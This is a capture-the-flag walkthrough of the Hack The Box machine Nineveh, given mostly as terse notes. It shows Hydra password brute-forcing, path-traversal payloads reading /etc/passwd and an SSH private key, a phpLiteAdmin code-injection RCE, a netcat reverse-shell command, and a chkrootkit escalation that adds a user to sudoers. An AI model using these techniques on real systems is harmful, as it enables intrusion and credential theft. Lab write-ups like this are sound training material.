Nineveh — HTB Walkthrough
Nmap Scan
Adding nineveh.htb to hosts
Visiting website shows
Gobuster Scan and nikto scan
When we try to login as amrois — amrois it says wrong username.When we try to enter admin -admin it says wrong password.Tried SQL injection, but didn’t work. Running a gobuster scan again on department
After enumerating a lot I found there is no option left apart from bruteforcing password. Capture request on burp
Now use hydra and wordlists rockyout.txt
We got the password
Checking notes we see
LFI used further after 443
php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd : works
php://filter/convert.base64-encode/resource=../../../../../../../../home/amrois/.ssh/id_rsa : Gives us file name too long
Nikto Scan
Gobuster Scan revealed
Visiting /db
After enumerating a lot on phpLiteAdmin, I couldn’t find a good exploit. So we did bruteforce on db/index.php
Capture on burp
Using hydra , we get password : password123 , < run hydra with rockyou.txt for password and username: admin, it doesn’t make a difference, since there is no user defined>
We see we have access to db. And we have an exploit to RCE
Going as per exploit
This did not work on executing LFI, which will be shown with real exploit after a minute. So now instead of making a field with default value containing malicious code. We will create field name containing malicious code
Hack.php doesn’t work, because LFI needs name ninevehNotes
And it worked
For getting shell we will be sending URL encoded reverse shell. I first used URL encoded nc -nv 1234 -e /bin/sh. But that didn’t work so. We will use pipe.
Doing strings command on both we see. Nineveh.png gave ssh keys
So we check knockd.conf to see SSH rules
Simply running SSH on this doesn’t work. So we need to do a nmap scan on each of ports metioned above in same order
We see every mnute a report is generated in report folder accessed by . Now since this is done by chkrootkit, which is vulnerable to exploit. When there is no valid file name it takes input from /tmp/update.
So we will manipulate update file in tmp directory (we will make a file /tmp/update) . And ask it to give permission to /etc/sudoers and write amrois in sudoers, which require no auth for running sudo command and again restore permissions of /etc/sudoers